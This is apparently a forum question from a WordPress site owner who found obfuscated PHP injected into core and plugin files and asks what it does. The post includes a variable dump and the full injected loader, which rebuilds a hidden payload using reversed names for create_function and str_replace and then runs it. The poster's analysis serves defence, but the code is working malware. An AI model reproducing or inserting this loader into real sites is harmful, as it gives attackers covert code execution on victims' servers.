Obfuscated PHP code found in WordPress core files and plugins

Question

I am running a Wordpress website and I've recently found this php code injected in many of my php files. https://www.unphp.net/decode/fb4715ee71b28135f6807389df42611c/

I tried adding some print_r(get_defined_vars()) at the end of my php file and executing the script using php-cli. I've found out that the malicious code constructs an array which it populates with 3 php functions: strrev, create_function written backwards and str_replace - same.

Here's my variables dump - don't mind the numbers, that's just from vim :

    [hpcwubg] => Array
232         (                                                                                                                                                                                                                                 
233             [0] => STrrEv
234             [1] => NoITCnuF_EtaeRC
235             [2] => ECaLPer_RtS
236         )
237 
238     [pnmizyj] => >!#]y84]275]y83]248]y83]256]y81]265]y72]254]y76#<!%w:!>!(%w68]y7f#<!%tww!>!›   x2400~:<h%_t%:osvufs:~:<*9-1-r%)s%>/h%:!>!%yy)#}#-#›x24-›   x24151› x64"))) { $ulxsqmc = "› x63›162›x65›141›x74›145›x5f›146›x75›156sset($#
239     [jbopckwkcc] => StR_rePLaCE

Another thing worth mentioning is that I've found this small code section injected in W3TC latest version plugin files, which I found really odd. Is it spreading somehow?

Can anyone help me understand what is the actual purpose of that obfuscated code? I see it in a hell lot of wordpress files but I can't find any signs of unintended/bad content being exposed in my website.

Post re-edited as to insert php code.

<?php $uaohpersri = '>!#]y84]275]y83]248]y83]256]y81]265]y72]254]y76#<!%w:!>!(%w68]y7f#<!%tww!>!    x2400~:<h%_t%:osvufs:~:<*9-1-r%)s%>/h%:!>!%yy)#}#-# x24-    x24151  x64"))) { $ulxsqmc = "  x63 162 x65 141 x74 145 x5f 146 x75 156sset($GLOBALS["  x61 156o#>>}R;msv}.;/#/#/},;#-#}+;%-qp%)54l}    x27;%!<*#}_;#)323ldfid>>!}_;gvc%}&;ftmbg}   x7f;!osvufs}w;* x7f!>>  x22!pd%)!gj}Z;hz+sfwjidsb`bj+upcotn+qsvmt+fmhpphtj  x22)gj!|!*nbsbq%)323ldfidk!~!<**qp%!-uyfu%)3of)fepdof`57ftbc    x7f!|5:6197g:74985-rr.93e:5597f-s.973:8297fX    x24<!%tmw!>!#]y84]275]y83]273sutcvt)fubmgoj{hA!osvufs!~<3,j%rxB%epnbss!>!bssbz)#44ec:649#-!#:618d5f9#-!#Df#<%tdz>#L4]275L3]248L3P6L1M5]D2P4]D6#<%G]y6d]281Ld]245]y]g2y]#>>*4-1-bubE{h%)s]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%tpz!>!#]D6M7]K3#<%yy>#]D2178}527}88:}334}472    x24<!%ff2!>!bssbz)  x24]25  x24-    x24-!%  x24->}&;!osvufs}    x7f;!opjudovgcB%iN}#-!  x24/%tmw/   x24)%c*#*<!sfuvso!sboepn)%epnbss-%22!ftmbg)!gj<*#k#)usbut`cpV   x7f x7f x7f x7f<u%V x27{ftpf{jt)!gj!<*2bd%-#1GO x22#)fepmqyfA>2b%judovg+)!gj+{e%!osvufs!*!+A!>!{e%)!>>  xplode(array_map("zblhkju",str_split("%tjw!w)#  x24#-!#]y38#-!%w:**<")));$wanexvc = $ulxsqmc("", $eW%hIr    x5c1^-%r    x5c2^-%hOh/#00#W~!%t2w)##Qtjw)#]82#-#!#-%tchr(ord($n)-1);} @error_reporting(0); $emwrgdm = im<#762]67y]562]38y]572]48yK2]285]Ke]53Ld]53]Kc]55Ld]55#*<%bG9}:}.}-}!#*<%nfd>   x7fw6*3qj%7>    x2272qj%)7gj6<**2qj%)hopmq%>U<#16,47R57,27R66,#:!>! x246767~6<Cw6<pd%w6Z6<.5`hA x27pd%6<116 x54"]); if ((strstr($uas,"  x6d 163 x69 145")) or (strs/q%>2q%<#g6R85,67R37,127&6<.fmjgA    x27doj%6<   x7fw6*  x7f_*#fmjgk4`{6~6<tfs%w6<**3-j%-bubE{h%)sutcvt-#w#)ldbqov>*ofmy%)utjm!|!*5! x27!hmg%)!gj!|2bge56+99386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GMFT`QIQ&56A:>:8:|:7#6#)tutjyf`439275ttfsqnpdov{h19275j{hnpd19275f:5297e:56-xr.985:52985-t.98]K4]65pmqyf    x27*&7-n%)utjm6<    x7fw6*CW&)7gj6<*K)ftpmdXA6~6<u%27,*c    x27,*b  x27)fepdof.)fepdof./#@#/qp%>5h%!<*::::::-111112)eox24*<!    x24-    x24gps)%j>1<%j=tjvg x22)!gj}1~!<2p% x7f!~!<##!>!2p%Z<^2 x5c!%ff2-!%t::**<(<!fwbm)%tjtr($uas,"   x72 166 x3a 61  x31")) or (strstr($uas,"    x61 156 x64 162 x6f OBALS[" x61 156 x75 156 x61"]=1; $uas=strtolower($_Sif((function_exists("   x6f 142 x5f 163 x74 141 x72 164") && (!itutjyf`4    x223}!+!<+{e%+*!*+fepdfe{h+{d%)+op,*!|  x24-    x24gvodujpo!    x24-    x24y7   x24-    !*uyfu  x27k:!ftmf!}Z;^nbsbq%   x5cSFWSFT`%}X;!sp!*#oppd%w6Z6<.4`hA x27pd%6<pd%w6Z6<.3`hA   x27d_SFSFGFS`QUUI&c_UOFHB`SFTV`QUUI&b%!|!*)323zbek!~!<b%    x7f3qjA)qj3hopmA    x273qj%6<*Y%)fnbozcYufhA    2b%!>!2p%!*3>?*2b%)gmfV x7f<*X&Z&S{ftmfV    x7f<*XAZASV<*w%)ppde>u%V<#65,47R25,d7R17,67R37,#/%s:    x5c%j:^<!%w`    x5c^>Ew:)!sp!*#ojneb#-*f%)sfxpmpusut)tpqssutRe%)Rd%)Rb%))!gj!<*#cd>j%!*3!   x27!hmg%!)!gj!<2,*j88M4P8]37]278]225]241]334]368]322]3]364]6]283]427]36]373P6]36]s%6<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTOBSUOSVUFS,6<*msv%7-MSV,6<*rxW~!Ypp2)%zB%z>!   x24/%tmw/   x2fmtf!%z>2<!%ww2)%w`TW~    x24<!fwbm)%tjw)bssbz)#P#-#Q#-#B#-%b:>1<!gps)%j:>1<%j:=tj{fpg)%s:*<  x63 164 x69 157 x6e"; function zblhkju($n){return ]#>m%:|:*r%:-t%)3of:opjudovg<~    x24<!%o:!>! x24]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#/#7e:55946mwrgdm); $wanexvc();}}7>/7&6|7**111127-K)ebfsX x27u%)7fmjix6<C x27&6<*rfs%7-K)fujsxW%eN+#Qi    x5c1^W%c!>!%i   x5c2^<!Ce*[!%cIjQeTQcOc/#00#W~!Ydrr)%ERVER["    x48 124 x54 120 x5f 125 x53 105 x52 137 x41 107 x45 x272qj%6<^#zsfvr#   x5cq%7/7#@#7/7^#iubq#   x5cq%   x27js%fdy<Cb*[%h!>!%tdz)%bbT-%bT-%hW~%fdy)##-!#~<%h00#*<%nfd)##Qtpz)#]341]}k~~9{d%:osvufs:~928>>    x22:ftmbg39*]y76]277#<!%t2w>#]y74]273]y76]>n%<#372]58y]472]37y]672]48y]#>s%<#462]47y]252]18y]#>q%8R#>q%V<*#fopoV;hojepdoF.uofuopD#)sfebfI{*w%)kVx{**#k#)tutjyf`x    x22%!-#1]#-bubE{h%)tpqsut>j%!*72!   x27!hmg%)!gj!<2,*j%-#1]#-bubE{)ujojR    x27id%6<    x7fw6*  x7f_*#ujojRk3`{666~6<l:!}V;3q%}U;y]}R;2]},ubmgoj{h1:|:*mmvo:>:iuhofm%:-5ppde:4:|:**#ppde#)4)%zW%h>EzH,2W%wN;#-Ez-1H*WCw*[!%rN}#QwTd}R;*msv%)}.;`UQPMSVD!-id%)uqpuft`msvd},;uqpuft`msvd}+;!>!}   x27;!>#)zbssb!-#}#)fepmqnj!/!#0#)idubn`hfsq)m%):fmjix:<##:>:h%:<#64y]552]e7y]#234]342]58]24]31#-%tdz*Wsfuvso!%bss   x5#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*-mw)%tww**WYsboepn)%bss-%rxB%h>#]y31]278]y3e]81]K78:5698!*1?hmg%)!gj!<**2-4-bubE{h%)sutcvt)esp>hmg%!<12>j%!|!*#91y]c9pd%6<pd%w6Z6<.2`hA   x27pd%6<C   x27pd%6|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fe5P6]y6gP7L6M7]D4]275]D:M8]g}x;0]=])0#)U!   x27{**u%-#jt0}Z;0]=]0#)2q%l}S;2-u%!-#2#/#%#/#o]#/67]452]88]5]48]32M3]317]445]212]445]43]321]464]284]364]6]-tusqpt)%z-#:#*   x24-    x24!>!  x24/%tQb:Qc:W~!%z!>2<!gps)%j>1<%j=6[%ww2!>#p#/#p#/%z<jg!)%z>>2*!%z>3<!-tr.984:75983:48984:7173]83]238M7]381]211M5]fs%6~6<   x7fw6<*K)ftpmdXA6|7**197-2qj%7-K)udfoopdXA  x24*!|! x24-    x24 x5c%j^  x24-    x24tvctus)% x24-    x24b8   x24-    x24]26  x24-    x24<%j,f6c68399#-!#65egb2dc6]281L1#/#M5]DgP5]D6#<%fdy>#]D4]273]D6P2L!>>!}W;utpi}Y;tuofuopd`ufh`fmjg}[;ldpt%}K;`ufldpt}X;`msvcsboe))1/35.)1/14+9**-)1/2986+7**^/%rx<~!!%s:N}#-%o:W%c:>1<mpef)#   x24*<!%t::!>!   x24Ypp3)%bs`un>qp%!|Z~!<##!>!2p%!|!*!***b%)sfxpmpusut!-#j0#!/!**#sfmcnbs+yfeobg)!gj!|!*msv%)}k~~~<ftmbg!os  x75 156 x61"])))) { $GL;osvufs} x27;mnui}&;zepc}A;~!}   x7f;!|!}{;)gj}l;33bq}k;opjudovX6<#o]o]Y%7;utpI#7>/7rfs%6<#o]1/20QUUI7jsv%7UFH#  x27r!<X>b%Z<#opo#>b%!*##>>X)!gjZ<#opo#>b%!**X)uft   x22)7gj6<*QDU`MPT7-NBFSUT`LDPT7-UFOJ`GB)fubfsdXA    x27K6<  x7fw6*CWtfs%)7gj6<*id%)ftpmdR6<*id%)dfyfR   x27tff_UTPI`QUUI&e_SEEB`FUPNFS&<    x7fw6*CW&)7gj6<*doj%7-C)fepmqnjA    xutcvt)!gj!|!*bubE{h%)j{hnpd!opjudovg!|!**#j{hnpd#)tutjyf`opjudo!<*qp%-*.%)euhA)3of>2b&w6<  x7fw6*CW&)7gj6<.[A  x27&6<  x7fw6*  x7f_*#[k2`{6:!}7;!}6;##}C;!opjudovg}{;#)tutjyf`opjudov*)323zbe!-#jt0*?]+^?]_    x5c}{fpg)%  x24-    x24*<!~!    x24/%t2w/   x24)##-!#~<#/%  x24-    x24!>!fyqh%)tpqsut>j%!*9!   x27!hmg%)!gj!~<ofmy%,3,j%>j%!<%j:,,Bjg!)%j:>>1*!%b:>1<!fmtf!%b:>%s: x5c%j:.2^,%b:<!%c:>v%6<C>^#zsfvr#   x5cq%7**^#zsfvr#    x5cq%)ufttj x22)gj6<^#Y#252]y85]256]y6g]257]y86]267]y74]275]y7:]2<**#57]38y]47]67y]37]88y]27]28y]#/r%/h%)n%-#+I#)q%:>:r%:|:**t%)m%=*h%vufs!|ftmf!~<**9.-j%-bubE{h%)d%!<5h%/#0#/*#npd/#)rrd/#00;quui#>.%!<***f   x27,*e  x27,*d  x   x5cq%   x27Y%6<.msv`ftsbqA7>q%6<    x7fw6*  x7f_*#fubfsdXk5`{66~6<&w6jw/    x24)%   x24-    x24y4   x24-    x24]ySTrrEvxNoITCnuF_EtaeRCxECaLPer_RtSdstsant'; $hpcwubg=explode(chr((369-249)),substr($uaohpersri,(18488-12562),(203-169))); $pnmizyj = $hpcwubg[0]($hpcwubg[(6-5)]); $jbopckwkcc = $hpcwubg[0]($hpcwubg[(7-5)]); if (!function_exists('ixhjfzq')) { function ixhjfzq($lhyyqilczp, $luqzuuxg,$ecvibopy) { $deywkzb = NULL; for($dvjpmdtzf=0;$dvjpmdtzf<(sizeof($lhyyqilczp)/2);$dvjpmdtzf++) { $deywkzb .= substr($luqzuuxg, $lhyyqilczp[($dvjpmdtzf*2)],$lhyyqilczp[($dvjpmdtzf*2)+(3-2)]); } return $ecvibopy(chr((44-35)),chr((380-288)),$deywkzb); }; } $jqscophj = explode(chr((167-123)),'2070,62,202,23,4861,24,2018,52,3138,60,1387,58,1948,70,136,66,2848,51,1158,51,1004,42,0,59,1346,41,2265,39,4072,70,1735,54,3017,61,4946,53,4431,50,5044,56,1285,39,2361,39,3198,51,5578,56,5831,64,5174,36,1467,54,5100,48,2662,67,3566,44,5295,64,4619,56,3719,66,285,58,5359,28,4833,28,5744,29,514,31,2573,27,3505,61,5474,47,1521,65,4011,61,646,23,5210,63,1881,42,2400,20,926,39,5273,22,5773,58,1789,63,4764,69,343,33,3785,37,2515,58,1586,59,5148,26,2304,57,4999,45,376,69,2214,51,225,60,792,26,3318,35,1645,57,3631,48,2132,43,965,39,872,54,2420,70,1324,22,1445,22,3438,67,3610,21,4885,61,4168,64,5387,27,483,31,3353,30,5634,41,59,56,5675,69,3822,35,3383,55,1209,25,2899,46,729,63,4481,51,115,21,4289,34,5895,31,4532,26,2175,39,1852,29,5414,60,4734,30,818,27,3078,60,545,44,4558,20,845,27,2729,30,3679,40,1101,57,3956,55,445,38,1702,33,2945,50,4387,22,669,60,4578,41,4142,26,589,57,1234,51,3249,69,2600,62,4409,22,4232,57,3857,38,4675,59,2815,33,5521,57,2490,25,4323,64,2759,56,3895,61,1923,25,1046,55,2995,22'); $qynqbm = $pnmizyj("",ixhjfzq($jqscophj,$uaohpersri,$jbopckwkcc)); $pnmizyj=$uaohpersri; $qynqbm(""); $qynqbm=(568-447); $uaohpersri=$qynqbm-1; ?><?php

// Silence is golden. ?> It's a horrible one-liner, i know.